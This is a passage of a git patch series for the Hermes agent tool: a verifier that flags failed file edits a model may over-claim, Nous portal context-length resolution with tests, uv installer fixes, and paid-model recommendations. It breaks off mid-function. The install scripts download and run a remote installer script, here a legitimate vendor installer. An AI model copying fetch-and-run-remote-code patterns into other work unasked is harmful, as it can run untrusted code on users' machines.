   runtime_footer:         # Gateway: append a runtime-context footer to final replies
     enabled: false
     fields: ["model", "context_pct", "cwd"]
+  file_mutation_verifier: true    # Append an advisory footer when write_file/patch calls failed this turn
   language: en            # UI language for static messages (approval prompts, some gateway replies). en | zh | ja | de | es | fr | tr | uk
 ```
 
+### File-mutation verifier
+
+When `display.file_mutation_verifier` is `true` (default), Hermes appends a one-line advisory to the assistant's final response whenever a `write_file` or `patch` call failed during the turn and was never superseded by a successful write to the same path. This catches the "batch of parallel patches, half silently fail, model summarises success" class of over-claim without requiring you to manually run `git status` after every edit.
+
+Example footer:
+
+```
+⚠️ File-mutation verifier: 3 file(s) were NOT modified this turn despite any wording above that may suggest otherwise. Run `git status` or `read_file` to confirm.
+  • concepts/automatic-organization.md — [patch] Could not find match for old_string
+  • concepts/lora.md — [patch] Could not find match for old_string
+  • concepts/rag-pipeline.md — [patch] Could not find match for old_string
+```
+
+Set `file_mutation_verifier: false` (or `HERMES_FILE_MUTATION_VERIFIER=0`) to suppress the footer. The verifier only fires when real failures are outstanding at turn end — a model that retries a failed patch and succeeds within the same turn will not trigger it for that file.
+
 ### UI language for static messages
 
 The `display.language` setting translates a small set of static user-facing messages — the CLI approval prompt, a handful of gateway slash-command replies (e.g. restart-drain notices, "approval expired", "goal cleared"). It does **not** translate agent responses, log lines, tool output, error tracebacks, or slash-command descriptions — those stay in English. If you want the agent itself to reply in another language, just tell it in your prompt or system message.

From 2863e9484a1841d0a17044383c9a32482c01b20e Mon Sep 17 00:00:00 2001
From: rob-maron <132852777+rob-maron@users.noreply.github.com>
Date: Tue, 12 May 2026 14:59:31 -0400
Subject: [PATCH 13/59] Use nous portal as model metadata authority (#24502)

* nous portal metadata resolver

* minor fixes
---
 agent/model_metadata.py            |  94 +++++++++---
 tests/agent/test_model_metadata.py | 234 +++++++++++++++++++++++++++++
 2 files changed, 306 insertions(+), 22 deletions(-)

diff --git a/agent/model_metadata.py b/agent/model_metadata.py
index 100c33a136c..f5e34fc18c6 100644
--- a/agent/model_metadata.py
+++ b/agent/model_metadata.py
@@ -10,7 +10,7 @@ import os
 import re
 import time
 from pathlib import Path
-from typing import Any, Dict, List, Optional
+from typing import Any, Dict, List, Optional, Tuple
 from urllib.parse import urlparse
 
 import requests
@@ -1330,21 +1330,40 @@ def _resolve_codex_oauth_context_length(
     return None
 
 
-def _resolve_nous_context_length(model: str) -> Optional[int]:
-    """Resolve Nous Portal model context length via OpenRouter metadata.
+def _resolve_nous_context_length(
+    model: str,
+    base_url: str = "",
+    api_key: str = "",
+) -> Tuple[Optional[int], str]:
+    """Resolve Nous Portal model context length.
 
-    Nous model IDs are bare (e.g. 'claude-opus-4-6') while OpenRouter uses
-    prefixed IDs (e.g. 'anthropic/claude-opus-4.6'). Try suffix matching
-    with version normalization (dot↔dash).
+    Tries the live Nous inference endpoint first (authoritative), then falls
+    back to OpenRouter metadata with suffix/version matching.
+
+    Nous model IDs are bare after prefix-stripping (e.g. 'qwen3.6-plus',
+    'claude-opus-4-6') while OpenRouter uses prefixed IDs (e.g.
+    'qwen/qwen3.6-plus', 'anthropic/claude-opus-4.6').  Version
+    normalization (dot↔dash) is applied to handle name drifts.
+
+    Returns ``(context_length, source)`` where ``source`` is one of:
+      - ``"portal"``    — live /v1/models response (authoritative)
+      - ``"openrouter"`` — OpenRouter cache fallback (non-authoritative;
+        callers must NOT persist this to the on-disk cache or a single
+        portal blip will freeze the wrong value in forever)
+      - ``""``           — could not resolve
     """
-    metadata = fetch_model_metadata()  # OpenRouter cache
+    # Portal first — the Nous /models endpoint is authoritative for what our
+    # infrastructure enforces and may differ from OR (e.g. OR reports 1M for
+    # qwen3.6-plus; the portal correctly says 262144).  Fall back to the OR
+    # catalog only if the portal doesn't list the model.
+    if base_url:
+        portal_ctx = _resolve_endpoint_context_length(model, base_url, api_key=api_key)
+        if portal_ctx is not None:
+            return portal_ctx, "portal"
+
+    metadata = fetch_model_metadata()
 
     def _safe_ctx(or_id: str, entry: dict) -> Optional[int]:
-        """Return context length, but reject stale 32k values for Kimi models.
-
-        Apply the same guard used for the generic OpenRouter path (step 6 in 
-        resolve_context_length) so the Nous portal path does not short-circuit it.
-        """
         ctx = entry.get("context_length")
         if ctx is None:
             return None
@@ -1357,19 +1376,20 @@ def _resolve_nous_context_length(model: str) -> Optional[int]:
             return None
         return ctx
 
-    # Exact match first
     if model in metadata:
-        return _safe_ctx(model, metadata[model])
+        ctx = _safe_ctx(model, metadata[model])
+        if ctx is not None:
+            return ctx, "openrouter"
 
     normalized = _normalize_model_version(model).lower()
 
     for or_id, entry in metadata.items():
         bare = or_id.split("/", 1)[1] if "/" in or_id else or_id
         if bare.lower() == model.lower() or _normalize_model_version(bare).lower() == normalized:
-            return _safe_ctx(or_id, entry)
+            ctx = _safe_ctx(or_id, entry)
+            if ctx is not None:
+                return ctx, "openrouter"
 
-    # Partial prefix match for cases like gemini-3-flash → gemini-3-flash-preview
-    # Require match to be at a word boundary (followed by -, :, or end of string)
     model_lower = model.lower()
     for or_id, entry in metadata.items():
         bare = or_id.split("/", 1)[1] if "/" in or_id else or_id
@@ -1377,9 +1397,11 @@ def _resolve_nous_context_length(model: str) -> Optional[int]:
             if candidate.startswith(query) and (
                 len(candidate) == len(query) or candidate[len(query)] in "-:."
             ):
-                return _safe_ctx(or_id, entry)
+                ctx = _safe_ctx(or_id, entry)
+                if ctx is not None:
+                    return ctx, "openrouter"
 
-    return None
+    return None, ""
 
 
 def get_model_context_length(
@@ -1394,14 +1416,18 @@ def get_model_context_length(
 
     Resolution order:
     0. Explicit config override (model.context_length or custom_providers per-model)
-    1. Persistent cache (previously discovered via probing)
+    1. Persistent cache (previously discovered via probing).  Nous URLs
+       bypass the cache here so step 5b can always reconcile against
+       the authoritative portal /v1/models response.
     1b. AWS Bedrock static table (must precede custom-endpoint probe)
     2. Active endpoint metadata (/models for explicit custom endpoints)
     3. Local server query (for local endpoints)
     4. Anthropic /v1/models API (API-key users only, not OAuth)
     5. Provider-aware lookups (before generic OpenRouter cache):
        a. Copilot live /models API
-       b. Nous suffix-match via OpenRouter cache
+       b. Nous: live /v1/models probe first (authoritative), then OR
+          cache fallback with suffix/version normalisation.  Only
+          portal-derived values are persisted to disk.
        c. Codex OAuth /models probe
        d. GMI /models endpoint
        e. Ollama native /api/show probe (any base_url, provider-agnostic)
@@ -1464,6 +1490,20 @@ def get_model_context_length(
                     model, base_url, f"{cached:,}",
                 )
                 _invalidate_cached_context_length(model, base_url)
+            # Nous Portal: the portal /v1/models endpoint is authoritative.
+            # Bypass the persistent cache so step 5b can always reconcile
+            # against it — this corrects pre-fix entries seeded from the
+            # OR catalog (the same OR underreport class that the Kimi/Qwen
+            # DEFAULT_CONTEXT_LENGTHS overrides exist to mitigate) without
+            # touching the on-disk file when the portal is unreachable.
+            # The in-memory 300s endpoint metadata cache makes the per-call
+            # cost amortise to ~0 within a process.
+            elif _infer_provider_from_url(base_url) == "nous":
+                logger.debug(
+                    "Bypassing persistent cache for %s@%s (Nous portal authoritative)",
+                    model, base_url,
+                )
+                # Fall through; step 5b reconciles and overwrites if portal responds.
             else:
                 return cached
 
@@ -1555,8 +1595,18 @@ def get_model_context_length(
             pass  # Fall through to models.dev
 
     if effective_provider == "nous":
-        ctx = _resolve_nous_context_length(model)
+        ctx, source = _resolve_nous_context_length(
+            model, base_url=base_url or "", api_key=api_key or ""
+        )
         if ctx:
+            # Persist ONLY portal-derived values.  Caching an OR-fallback
+            # value here would freeze in a wrong number on the first portal
+            # blip / auth glitch and step-1 would short-circuit it forever.
+            # OR's catalog is community-maintained and is precisely why the
+            # Kimi/Qwen DEFAULT_CONTEXT_LENGTHS overrides exist — we don't
+            # want it leaking into the persistent cache for Nous URLs.
+            if base_url and source == "portal":
+                save_context_length(model, base_url, ctx)
             return ctx
     if effective_provider == "openai-codex":
         # Codex OAuth enforces lower context limits than the direct OpenAI
diff --git a/tests/agent/test_model_metadata.py b/tests/agent/test_model_metadata.py
index 63422ab5306..7686364dcac 100644
--- a/tests/agent/test_model_metadata.py
+++ b/tests/agent/test_model_metadata.py
@@ -473,6 +473,240 @@ class TestCodexOAuthContextLength:
         assert ctx == 1_000_000, "Non-codex 1M cache entries must be respected"
 
 
+# =========================================================================
+# Nous Portal context-window resolution (provider="nous")
+# =========================================================================
+
+class TestNousPortalContextResolution:
+    """Nous Portal /v1/models is authoritative for what Nous infra enforces
+    and may diverge from the OpenRouter catalog.
+
+    Invariants this class pins down:
+      1. Portal value wins over the OR fallback.
+      2. Portal-derived values are persisted to disk.
+      3. OR-fallback values are NEVER persisted — otherwise a single portal
+         blip would freeze the wrong value in via step-1 cache short-circuit.
+      4. Pre-fix persistent-cache entries (seeded from the OR catalog) are
+         bypassed at step 1 and overwritten once the portal responds.
+      5. Pre-fix persistent-cache entries SURVIVE on disk when the portal
+         is unreachable — no opportunistic invalidation that loses the only
+         value we have.
+    """
+
+    def setup_method(self):
+        import agent.model_metadata as mm
+        mm._endpoint_model_metadata_cache.clear()
+        mm._endpoint_model_metadata_cache_time.clear()
+
+    @patch("agent.model_metadata.fetch_endpoint_model_metadata")
+    @patch("agent.model_metadata.fetch_model_metadata")
+    def test_portal_value_wins_over_openrouter_catalog(
+        self, mock_or, mock_portal, tmp_path, monkeypatch
+    ):
+        """The motivating case: OR catalog says 1M for qwen3.6-plus, but
+        the Nous portal correctly enforces 262144.  Portal must win."""
+        import agent.model_metadata as mm
+        cache_file = tmp_path / "context_length_cache.yaml"
+        monkeypatch.setattr(mm, "_get_context_cache_path", lambda: cache_file)
+
+        mock_portal.return_value = {
+            "qwen3.6-plus": {"context_length": 262_144},
+        }
+        mock_or.return_value = {
+            "qwen/qwen3.6-plus": {"context_length": 1_000_000},
+        }
+
+        ctx = mm.get_model_context_length(
+            model="qwen3.6-plus",
+            base_url="https://inference-api.nousresearch.com/v1",
+            api_key="fake-token",
+            provider="nous",
+        )
+        assert ctx == 262_144, (
+            f"Portal must override OR catalog; got {ctx} (OR leak?)"
+        )
+
+    @patch("agent.model_metadata.fetch_endpoint_model_metadata")
+    @patch("agent.model_metadata.fetch_model_metadata")
+    def test_portal_value_is_persisted_to_disk(
+        self, mock_or, mock_portal, tmp_path, monkeypatch
+    ):
+        """Portal-derived value should land in the persistent cache so
+        cross-process callers (e.g. child agents) see the same value."""
+        import agent.model_metadata as mm
+        cache_file = tmp_path / "context_length_cache.yaml"
+        monkeypatch.setattr(mm, "_get_context_cache_path", lambda: cache_file)
+
+        mock_portal.return_value = {
+            "qwen3.6-plus": {"context_length": 262_144},
+        }
+        mock_or.return_value = {}
+
+        base_url = "https://inference-api.nousresearch.com/v1"
+        ctx = mm.get_model_context_length(
+            model="qwen3.6-plus",
+            base_url=base_url,
+            api_key="fake",
+            provider="nous",
+        )
+        assert ctx == 262_144
+        persisted = yaml.safe_load(cache_file.read_text()).get("context_lengths", {})
+        assert persisted.get(f"qwen3.6-plus@{base_url}") == 262_144, (
+            "Portal-derived value should be persisted to disk"
+        )
+
+    @patch("agent.model_metadata.fetch_endpoint_model_metadata")
+    @patch("agent.model_metadata.fetch_model_metadata")
+    def test_openrouter_fallback_is_not_persisted(
+        self, mock_or, mock_portal, tmp_path, monkeypatch
+    ):
+        """When the portal can't resolve a model (network blip, auth glitch,
+        model not yet listed) we fall back to the OR catalog so the agent
+        keeps working — but we must NOT write the OR value to disk.  Once
+        cached on disk, step-1 short-circuits forever and the user is stuck
+        with the wrong number until they manually clear the cache."""
+        import agent.model_metadata as mm
+        cache_file = tmp_path / "context_length_cache.yaml"
+        monkeypatch.setattr(mm, "_get_context_cache_path", lambda: cache_file)
+
+        mock_portal.return_value = {}  # portal unreachable / model unknown
+        mock_or.return_value = {
+            "qwen/qwen3.6-plus": {"context_length": 1_000_000},
+        }
+
+        base_url = "https://inference-api.nousresearch.com/v1"
+        ctx = mm.get_model_context_length(
+            model="qwen3.6-plus",
+            base_url=base_url,
+            api_key="fake",
+            provider="nous",
+        )
+        assert ctx == 1_000_000, "OR fallback should still serve the request"
+        assert not cache_file.exists() or not yaml.safe_load(
+            cache_file.read_text()
+        ).get("context_lengths", {}), (
+            "OR-fallback values must NOT be persisted — a single portal blip "
+            "would otherwise freeze the wrong value in via step-1 cache hit"
+        )
+
+    @patch("agent.model_metadata.fetch_endpoint_model_metadata")
+    @patch("agent.model_metadata.fetch_model_metadata")
+    def test_stale_cache_is_bypassed_and_overwritten_by_portal(
+        self, mock_or, mock_portal, tmp_path, monkeypatch
+    ):
+        """Users upgrading from pre-fix builds have ``qwen3.6-plus@…nous… =
+        1000000`` (OR-derived) sitting in their cache file.  Step 1 must
+        NOT short-circuit on that entry — step 5b reconciles against the
+        portal and overwrites the persistent value with 262144."""
+        import agent.model_metadata as mm
+        cache_file = tmp_path / "context_length_cache.yaml"
+        monkeypatch.setattr(mm, "_get_context_cache_path", lambda: cache_file)
+
+        base_url = "https://inference-api.nousresearch.com/v1"
+        stale_key = f"qwen3.6-plus@{base_url}"
+        other_key = "other-model@https://api.openai.com/v1"
+        cache_file.write_text(yaml.dump({"context_lengths": {
+            stale_key: 1_000_000,     # pre-fix OR-derived value
+            other_key: 128_000,       # unrelated, must survive
+        }}))
+
+        mock_portal.return_value = {
+            "qwen3.6-plus": {"context_length": 262_144},
+        }
+        mock_or.return_value = {}
+
+        ctx = mm.get_model_context_length(
+            model="qwen3.6-plus",
+            base_url=base_url,
+            api_key="fake",
+            provider="nous",
+        )
+        assert ctx == 262_144, (
+            f"Stale OR-derived cache entry should not have leaked through; got {ctx}"
+        )
+
+        remaining = yaml.safe_load(cache_file.read_text()).get("context_lengths", {})
+        assert remaining.get(stale_key) == 262_144, (
+            "Portal value should have overwritten the stale entry on disk"
+        )
+        assert remaining.get(other_key) == 128_000, (
+            "Unrelated cache entries must not be touched"
+        )
+
+    @patch("agent.model_metadata.fetch_endpoint_model_metadata")
+    @patch("agent.model_metadata.fetch_model_metadata")
+    def test_stale_cache_survives_when_portal_unreachable(
+        self, mock_or, mock_portal, tmp_path, monkeypatch
+    ):
+        """When the portal is unreachable AND we have a (potentially stale)
+        on-disk cache entry, the entry must survive untouched — we don't
+        want a transient outage to delete the only value we have.  The
+        request itself still gets served via OR fallback for this call."""
+        import agent.model_metadata as mm
+        cache_file = tmp_path / "context_length_cache.yaml"
+        monkeypatch.setattr(mm, "_get_context_cache_path", lambda: cache_file)
+
+        base_url = "https://inference-api.nousresearch.com/v1"
+        existing_key = f"qwen3.6-plus@{base_url}"
+        cache_file.write_text(yaml.dump({"context_lengths": {
+            existing_key: 1_000_000,
+        }}))
+
+        mock_portal.return_value = {}  # portal unreachable
+        mock_or.return_value = {
+            "qwen/qwen3.6-plus": {"context_length": 1_000_000},
+        }
+
+        mm.get_model_context_length(
+            model="qwen3.6-plus",
+            base_url=base_url,
+            api_key="fake",
+            provider="nous",
+        )
+
+        remaining = yaml.safe_load(cache_file.read_text()).get("context_lengths", {})
+        assert remaining.get(existing_key) == 1_000_000, (
+            "Persistent cache entry must survive a transient portal outage"
+        )
+
+    @patch("agent.model_metadata.fetch_endpoint_model_metadata")
+    @patch("agent.model_metadata.fetch_model_metadata")
+    def test_bypass_keyed_on_url_not_provider_string(
+        self, mock_or, mock_portal, tmp_path, monkeypatch
+    ):
+        """Some call sites pass ``provider=""`` or ``provider="openrouter"``
+        when the user is really on Nous Portal (e.g. cred-pool fallback).
+        The Nous-URL bypass must trigger off the URL host, not the provider
+        string, so the portal-first resolver still runs in that case."""
+        import agent.model_metadata as mm
+        cache_file = tmp_path / "context_length_cache.yaml"
+        monkeypatch.setattr(mm, "_get_context_cache_path", lambda: cache_file)
+
+        base_url = "https://inference-api.nousresearch.com/v1"
+        cache_file.write_text(yaml.dump({"context_lengths": {
+            f"qwen3.6-plus@{base_url}": 1_000_000,  # stale
+        }}))
+
+        mock_portal.return_value = {
+            "qwen3.6-plus": {"context_length": 262_144},
+        }
+        mock_or.return_value = {}
+
+        for provider_arg in ("", "openrouter", "custom"):
+            mm._endpoint_model_metadata_cache.clear()
+            mm._endpoint_model_metadata_cache_time.clear()
+            ctx = mm.get_model_context_length(
+                model="qwen3.6-plus",
+                base_url=base_url,
+                api_key="fake",
+                provider=provider_arg,
+            )
+            assert ctx == 262_144, (
+                f"URL-based Nous detection must fire for provider={provider_arg!r}; "
+                f"got {ctx}"
+            )
+
+
 # =========================================================================
 # get_model_context_length — resolution order
 # =========================================================================

From d186186e1af74c3e4568e4775d55e0f24f5c2071 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 12:11:16 -0700
Subject: [PATCH 14/59] fix(install): surface uv install + uv.lock sync errors
 instead of silently hanging (#24504)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The c1eb2dcda tiered installer made two install paths look frozen on
slow networks or broken environments because both swallowed the
underlying tool's stderr.

scripts/install.sh, setup-hermes.sh:
  curl -LsSf https://astral.sh/uv/install.sh | sh 2>/dev/null
  printed only '✗ Failed to install uv' on failure with no diagnostic.
  Common real causes (glibc mismatch on old distros, corp proxy / TLS
  interception, missing curl, ~/.local/bin not writable, disk full)
  were invisible. Also: piping curl into sh masks curl failures under
  set -e (no pipefail) — sh exits 0 on empty stdin, so a network error
  succeeded silently.
  Fix: download installer to a tempfile first, then run it. Capture
  curl + installer output to a log; on failure, indent and print it.

scripts/install.sh hash-verified tier:
  uv sync --all-extras --locked 2>"$(mktemp)" silenced uv's progress
  output, making a fresh-venv install (~50 transitives including
  torch-class deps) look hung for 1-5 minutes — users see 'Trying tier:
  hash-verified (uv.lock) ...' and assume it's frozen. The mktemp
  substitution also wasn't saved to a variable, so the uv error on
  failure was unreachable.
  Fix: stream uv's stderr directly so users see live 'Resolved N /
  Prepared / Installed' progress. Print an upfront note that the first
  run takes 1-5 minutes.
---
 scripts/install.sh | 50 ++++++++++++++++++++++++++++++++++++++++++----
 setup-hermes.sh    | 29 ++++++++++++++++++++++++---
 2 files changed, 72 insertions(+), 7 deletions(-)

diff --git a/scripts/install.sh b/scripts/install.sh
index f4fccea7d9e..c54f9ad9ae0 100755
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -366,7 +366,27 @@ install_uv() {
 
     # Install uv
     log_info "Installing uv (fast Python package manager)..."
-    if curl -LsSf https://astral.sh/uv/install.sh | sh 2>/dev/null; then
+    # Capture installer output so a failure shows the user WHY (network,
+    # glibc mismatch on old distros, missing curl, ~/.local/bin not
+    # writable, disk full, corp proxy / TLS interception, etc.) instead
+    # of the previous "✗ Failed to install uv" with zero diagnostic.
+    #
+    # Two-stage: download the installer, then run it.  Piping
+    # `curl | sh` masks curl failures (sh exits 0 on empty stdin)
+    # and conflates network errors with installer errors.
+    local _uv_install_log _uv_installer
+    _uv_install_log="$(mktemp 2>/dev/null || echo "/tmp/hermes-uv-install.$$.log")"
+    _uv_installer="$(mktemp 2>/dev/null || echo "/tmp/hermes-uv-installer.$$.sh")"
+    if ! curl -LsSf https://astral.sh/uv/install.sh -o "$_uv_installer" 2>"$_uv_install_log"; then
+        log_error "Failed to download uv installer from https://astral.sh/uv/install.sh"
+        log_info "curl output:"
+        sed 's/^/    /' "$_uv_install_log" >&2
+        log_info "Install manually: https://docs.astral.sh/uv/getting-started/installation/"
+        rm -f "$_uv_install_log" "$_uv_installer"
+        exit 1
+    fi
+    if sh "$_uv_installer" >>"$_uv_install_log" 2>&1; then
+        rm -f "$_uv_installer"
         # uv installs to ~/.local/bin by default
         if [ -x "$HOME/.local/bin/uv" ]; then
             UV_CMD="$HOME/.local/bin/uv"
@@ -375,15 +395,22 @@ install_uv() {
         elif command -v uv &> /dev/null; then
             UV_CMD="uv"
         else
-            log_error "uv installed but not found on PATH"
+            log_error "uv installer reported success but binary not found on PATH"
+            log_info "Installer output:"
+            sed 's/^/    /' "$_uv_install_log" >&2
             log_info "Try adding ~/.local/bin to your PATH and re-running"
+            rm -f "$_uv_install_log"
             exit 1
         fi
+        rm -f "$_uv_install_log"
         UV_VERSION=$($UV_CMD --version 2>/dev/null)
         log_success "uv installed ($UV_VERSION)"
     else
         log_error "Failed to install uv"
+        log_info "Installer output:"
+        sed 's/^/    /' "$_uv_install_log" >&2
         log_info "Install manually: https://docs.astral.sh/uv/getting-started/installation/"
+        rm -f "$_uv_install_log" "$_uv_installer"
         exit 1
     fi
 }
@@ -1073,12 +1100,27 @@ install_deps() {
     # extras spec, NOT because they're equivalent in posture.
     if [ -f "uv.lock" ]; then
         log_info "Trying tier: hash-verified (uv.lock) ..."
-        if UV_PROJECT_ENVIRONMENT="$INSTALL_DIR/venv" $UV_CMD sync --all-extras --locked 2>"$(mktemp)"; then
+        log_info "(this resolves + downloads ~50 packages — first run on a fresh"
+        log_info " venv can take 1-5 minutes; uv prints progress below)"
+        # Stream uv's progress directly to the user instead of swallowing
+        # it with `2>"$(mktemp)"`.  Two reasons:
+        #   1. `--all-extras --locked` against a fresh venv has to pull
+        #      every transitive (torch-class deps included) — silencing
+        #      stderr makes the install look frozen for minutes on slow
+        #      networks. Users see "Trying tier: hash-verified ..." and
+        #      assume it's hung.
+        #   2. The previous `2>"$(mktemp)"` substituted the path at
+        #      command-build time but never saved it, so on failure the
+        #      uv error message was unreachable — the user just got the
+        #      generic "lockfile may be stale" warning.
+        # uv's own progress UI handles TTY detection and downgrades
+        # gracefully when stdout/stderr aren't terminals.
+        if UV_PROJECT_ENVIRONMENT="$INSTALL_DIR/venv" $UV_CMD sync --all-extras --locked; then
             log_success "Main package installed (hash-verified via uv.lock)"
             log_success "All dependencies installed"
             return 0
         fi
-        log_warn "uv.lock sync failed (lockfile may be stale), falling back to PyPI resolve..."
+        log_warn "uv.lock sync failed (see uv output above), falling back to PyPI resolve..."
     else
         log_info "uv.lock not found — falling back to PyPI resolve (no hash verification)"
     fi
diff --git a/setup-hermes.sh b/setup-hermes.sh
index 9690d6a23a6..0b214b0633c 100755
--- a/setup-hermes.sh
+++ b/setup-hermes.sh
@@ -82,7 +82,22 @@ else
         echo -e "${GREEN}✓${NC} uv found ($UV_VERSION)"
     else
         echo -e "${CYAN}→${NC} Installing uv..."
-        if curl -LsSf https://astral.sh/uv/install.sh | sh 2>/dev/null; then
+        # Capture installer output so a failure shows the user WHY
+        # (network, glibc mismatch on old distros, missing curl, disk
+        # full, etc.) instead of "✗ Failed to install uv" with zero
+        # diagnostic.  Two-stage to avoid `curl | sh` masking curl
+        # failures (sh exits 0 on empty stdin under no pipefail).
+        _uv_log="$(mktemp 2>/dev/null || echo "/tmp/hermes-uv-install.$$.log")"
+        _uv_installer="$(mktemp 2>/dev/null || echo "/tmp/hermes-uv-installer.$$.sh")"
+        if ! curl -LsSf https://astral.sh/uv/install.sh -o "$_uv_installer" 2>"$_uv_log"; then
+            echo -e "${RED}✗${NC} Failed to download uv installer."
+            sed 's/^/    /' "$_uv_log" >&2
+            echo -e "${CYAN}→${NC} Install manually: https://docs.astral.sh/uv/"
+            rm -f "$_uv_log" "$_uv_installer"
+            exit 1
+        fi
+        if sh "$_uv_installer" >>"$_uv_log" 2>&1; then
+            rm -f "$_uv_installer"
             if [ -x "$HOME/.local/bin/uv" ]; then
                 UV_CMD="$HOME/.local/bin/uv"
             elif [ -x "$HOME/.cargo/bin/uv" ]; then
@@ -90,14 +105,22 @@ else
             fi
 
             if [ -n "$UV_CMD" ]; then
+                rm -f "$_uv_log"
                 UV_VERSION=$($UV_CMD --version 2>/dev/null)
                 echo -e "${GREEN}✓${NC} uv installed ($UV_VERSION)"
             else
-                echo -e "${RED}✗${NC} uv installed but not found. Add ~/.local/bin to PATH and retry."
+                echo -e "${RED}✗${NC} uv installer reported success but binary not found. Add ~/.local/bin to PATH and retry."
+                echo -e "${CYAN}→${NC} Installer output:"
+                sed 's/^/    /' "$_uv_log" >&2
+                rm -f "$_uv_log"
                 exit 1
             fi
         else
-            echo -e "${RED}✗${NC} Failed to install uv. Visit https://docs.astral.sh/uv/"
+            echo -e "${RED}✗${NC} Failed to install uv."
+            echo -e "${CYAN}→${NC} Installer output:"
+            sed 's/^/    /' "$_uv_log" >&2
+            echo -e "${CYAN}→${NC} Install manually: https://docs.astral.sh/uv/"
+            rm -f "$_uv_log" "$_uv_installer"
             exit 1
         fi
     fi

From c23a87bc163b188abc7e40fbdccf07a9739231c3 Mon Sep 17 00:00:00 2001
From: rob-maron <132852777+rob-maron@users.noreply.github.com>
Date: Tue, 12 May 2026 15:16:17 -0400
Subject: [PATCH 15/59] union paid recs from nous portal with static list
 (#24509)

---
 hermes_cli/auth.py              |  11 ++-
 hermes_cli/main.py              |   9 ++
 hermes_cli/models.py            |  65 +++++++++++++++
 tests/hermes_cli/test_models.py | 142 ++++++++++++++++++++++++++++++++
 4 files changed, 226 insertions(+), 1 deletion(-)

diff --git a/hermes_cli/auth.py b/hermes_cli/auth.py
index ac102d0be76..90d6a639358 100644
--- a/hermes_cli/auth.py
+++ b/hermes_cli/auth.py
@@ -5271,6 +5271,7 @@ def _login_nous(args, pconfig: ProviderConfig) -> None:
                 get_curated_nous_model_ids, get_pricing_for_provider,
                 check_nous_free_tier, partition_nous_models_by_tier,
                 union_with_portal_free_recommendations,
+                union_with_portal_paid_recommendations,
             )
             model_ids = get_curated_nous_model_ids()
 
@@ -5279,19 +5280,27 @@ def _login_nous(args, pconfig: ProviderConfig) -> None:
             if model_ids:
                 pricing = get_pricing_for_provider("nous")
                 free_tier = check_nous_free_tier()
+                _portal_for_recs = auth_state.get("portal_base_url", "")
                 if free_tier:
                     # The Portal's freeRecommendedModels endpoint is the
                     # source of truth for what's free *right now*. Augment
                     # the curated list with anything new the Portal flags
                     # as free so users on older Hermes builds still see
                     # newly-launched free models without a CLI release.
-                    _portal_for_recs = auth_state.get("portal_base_url", "")
                     model_ids, pricing = union_with_portal_free_recommendations(
                         model_ids, pricing, _portal_for_recs,
                     )
                     model_ids, unavailable_models = partition_nous_models_by_tier(
                         model_ids, pricing, free_tier=True,
                     )
+                else:
+                    # Paid-tier mirror: pull paidRecommendedModels so newly
+                    # launched paid models surface in the picker even if
+                    # the in-repo curated list and docs-hosted manifest
+                    # haven't caught up yet.
+                    model_ids, pricing = union_with_portal_paid_recommendations(
+                        model_ids, pricing, _portal_for_recs,
+                    )
             _portal = auth_state.get("portal_base_url", "")
             if model_ids:
                 print(f"Showing {len(model_ids)} curated models — use \"Enter custom model name\" for others.")
diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 33f915a9e6b..7a30a57ca77 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -2590,6 +2590,7 @@ def _model_flow_nous(config, current_model="", args=None):
         check_nous_free_tier,
         partition_nous_models_by_tier,
         union_with_portal_free_recommendations,
+        union_with_portal_paid_recommendations,
     )
 
     model_ids = get_curated_nous_model_ids()
@@ -2645,6 +2646,10 @@ def _model_flow_nous(config, current_model="", args=None):
     # with the Portal's freeRecommendedModels list so newly-launched free
     # models show up even if this CLI build's hardcoded curated list and
     # docs-hosted manifest haven't caught up yet.
+    #
+    # For paid users: mirror the same idea with paidRecommendedModels so
+    # newly-launched paid models surface in the picker too — independent
+    # of CLI release cadence.
     unavailable_models: list[str] = []
     if free_tier:
         model_ids, pricing = union_with_portal_free_recommendations(
@@ -2653,6 +2658,10 @@ def _model_flow_nous(config, current_model="", args=None):
         model_ids, unavailable_models = partition_nous_models_by_tier(
             model_ids, pricing, free_tier=True
         )
+    else:
+        model_ids, pricing = union_with_portal_paid_recommendations(
+            model_ids, pricing, _nous_portal_url,
+        )
 
     if not model_ids and not unavailable_models:
         print("No models available for Nous Portal after filtering.")
diff --git a/hermes_cli/models.py b/hermes_cli/models.py
index 813045dfd04..5f355d03b99 100644
--- a/hermes_cli/models.py
+++ b/hermes_cli/models.py
@@ -621,6 +621,71 @@ def union_with_portal_free_recommendations(
     return (augmented_ids, augmented_pricing)
 
 
+def union_with_portal_paid_recommendations(
+    curated_ids: list[str],
+    pricing: dict[str, dict[str, str]],
+    portal_base_url: str = "",
+    *,
+    force_refresh: bool = False,
+) -> tuple[list[str], dict[str, dict[str, str]]]:
+    """Augment curated list with the Portal's ``paidRecommendedModels``.
+
+    Mirror of :func:`union_with_portal_free_recommendations` for paid-tier
+    users. The Portal's ``/api/nous/recommended-models`` endpoint advertises
+    which paid models are blessed *right now* — independent of what the
+    in-repo ``_PROVIDER_MODELS["nous"]`` list happens to contain or whether
+    the docs-hosted catalog manifest has been rebuilt since the last release.
+
+    For paid-tier users this lets newly-launched paid models surface in the
+    picker even if the user is running an older Hermes that doesn't ship
+    them in its hardcoded curated list. This function returns an augmented
+    ``(model_ids, pricing)`` pair where:
+
+    * Portal paid recommendations missing from ``curated_ids`` are
+      appended at the front (so the picker shows them first).
+    * ``pricing`` is left untouched — we deliberately do NOT synthesize
+      pricing entries for paid models. Live pricing is fetched separately
+      via :func:`get_pricing_for_provider`; if the live endpoint hasn't
+      published pricing yet, the picker shows a blank price column rather
+      than fabricating numbers. (The free helper synthesizes ``$0`` so
+      :func:`partition_nous_models_by_tier` keeps free models selectable;
+      no equivalent gating applies on the paid side, so synthesis would
+      only mislead the user.)
+
+    Failures (network, parse, missing field) are silent and degrade to
+    returning the inputs unchanged — never block the picker on a
+    Portal-side hiccup.
+    """
+    try:
+        payload = fetch_nous_recommended_models(
+            portal_base_url, force_refresh=force_refresh
+        )
+    except Exception:
+        return (list(curated_ids), dict(pricing))
+
+    paid_block = payload.get("paidRecommendedModels") if isinstance(payload, dict) else None
+    if not isinstance(paid_block, list) or not paid_block:
+        return (list(curated_ids), dict(pricing))
+
+    portal_paid_ids: list[str] = []
+    for entry in paid_block:
